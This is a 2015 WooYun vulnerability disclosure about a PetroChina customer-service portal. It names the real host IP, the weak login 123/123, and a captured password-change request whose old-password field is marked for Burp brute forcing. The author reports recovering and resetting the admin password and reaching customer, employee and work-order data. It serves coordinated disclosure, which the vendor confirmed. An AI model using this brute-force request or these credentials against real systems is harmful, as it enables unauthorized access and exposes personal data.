当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146680

漏洞标题:中石油某系统一用户弱口令/重置管理员密码/泄漏大量员工信息/客户信息

相关厂商:中国石油天然气集团公司

漏洞作者: sqlfeng

提交时间:2015-10-14 14:28

修复时间:2015-11-28 15:56

公开时间:2015-11-28 15:56

漏洞类型:后台弱口令

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-14: 细节已通知厂商并且等待厂商处理中
2015-10-14: 厂商已经确认,细节仅向厂商公开
2015-10-24: 细节向核心白帽子及相关领域专家公开
2015-11-03: 细节向普通白帽子公开
2015-11-13: 细节向实习白帽子公开
2015-11-28: 细节向公众公开

简要描述:

弱口令啊

详细说明:

http://123.125.17.201:7070/cc/portal.jsp
中石油客服中心系统
弱口令 123 123
进去后
修改密码处 抓包

POST /cc/login.do?method=modifyPassword HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://123.125.17.201:7070/cc/login.do?method=modifyPassword
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 123.125.17.201:7070
Content-Length: 91
Pragma: no-cache
Cookie: motoAbcCmsLoginName=123; JSESSIONID=D8EDE036A5F7A82DB266755C5ADAB270; _user_info="rO0ABXNyACljb20uaG9sbHljcm0uc2VydmljZS5sb2dpbi5tb2RlbC5Vc2VySW5mb3s1p9qnFCc5AgAXWgAGaXNUZW1wTAAHYWdlbnRETnQAEkxqYXZhL2xhbmcvU3RyaW5nO0wABmFyZWFJZHEAfgABTAAQY3VycmVudElwQWRkcmVzc3EAfgABTAAKZGJVc2VyTmFtZXEAfgABTAAGZGVwdElkcQB+AAFMAAplbXBsb3llZU5vcQB+AAFMAAdncm91cElkcQB+AAFMAAxpbnZhbGlkX2RhdGV0ABBMamF2YS91dGlsL0RhdGU7TAAJbG9naW5Sb2xlcQB+AAFMAAlsb2dpblRpbWVxAH4AAUwACG5pY2tOYW1lcQB+AAFMAApwYXJhbWV0ZXJzdAAPTGphdmEvdXRpbC9NYXA7TAAIcGFzc3dvcmRxAH4AAUwACHJlYWxOYW1lcQB+AAFMAAZzdGF0dXNxAH4AAUwACXN1YmplY3RJZHEAfgABTAAFdG9rZW5xAH4AAUwABnVzZXJJZHEAfgABTAAIdXNlck5hbWVxAH4AAUwACHVzZXJUeXBlcQB+AAFMAAp2YWxpZF9kYXRlcQB+AAJMAAt2aWV3TGV2ZWxOb3EAfgABeHAAdAAEMDAwMHQAAHQADzExOC4xOTMuMTUzLjE3MXB0AAxEMDAwMDAwMDAyMDdxAH4ABnEAfgAGcHB0ABMyMDE1LTEwLTE0IDEzOjA5OjIzdAADMTIzcHQABE1USXp0AAnoooHmsYnojaN0AAExdAAMRTAwMDAwMDAzMjUzdAAgZmY4MDgwODE0ZmRiZjllMjAxNTA2NGMwYjlkNDMwNWR0AAxVMDAwMDAwMDMwODh0AAnoooHmsYnojaN0AAhlbXBsb3llZXBxAH4ABg=="; _loginInfo="rO0ABXNyADNjb20uaG9sbHljcm0uc2VydmljZS5zeXN0ZW0uc2VjdXJpdHkubW9kZWwuTG9naW5Mb2eoEPdB+1HU3QIAB0wAAmlwdAASTGphdmEvbGFuZy9TdHJpbmc7TAAFbG9nSWRxAH4AAUwACWxvZ2luTmFtZXEAfgABTAAJbG9naW5UaW1lcQB+AAFMAApsb2dvdXRUaW1lcQB+AAFMAAZ1c2VySWRxAH4AAUwACHVzZXJOYW1lcQB+AAF4cHQADzExOC4xOTMuMTUzLjE3MXQAFDAwMDAwMDAwMDAwMDAwNTExNzkxdAADMTIzdAATMjAxNS0xMC0xNCAxMzowOToyM3B0AAxVMDAwMDAwMDMwODh0AAnoooHmsYnojaM="
name=admin&oldPassword=§admin§&newPassword=admin&repeatPassword=admin&Submit=%E7%A1%AE%E8%AE%A4


name是用户名,可控,所以很有可能不要验证码就可以爆破出admin的密码
burp抓包,发送到自动化模块,name改成admin oldPassword值设置为变量
结果不错,原密码出来了,不过已经重置为admin了
自行修改
so 进系统看看,有了admin干啥都来劲

漏洞证明:

QQ截图20151013223520.png


客户

QQ截图20151013223530.png


一些分公司的信息

QQ截图20151013223604.png


3500名员工

QQ截图20151013224417.png


57000条工单

QQ截图20151013224544.png


QQ截图20151013224636.png


QQ截图20151013224810.png


全国的所有的分公司包括所有负责人经理总经理的信息

QQ截图20151013224925.png


客户信息管理
好了,点到为止,未作任何恶意操作!!!

修复方案:

杜绝弱口令!

版权声明:转载请注明来源 sqlfeng@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-10-14 15:55

厂商回复:

非常感谢您的报告,问题已着手处理.

最新状态:

暂无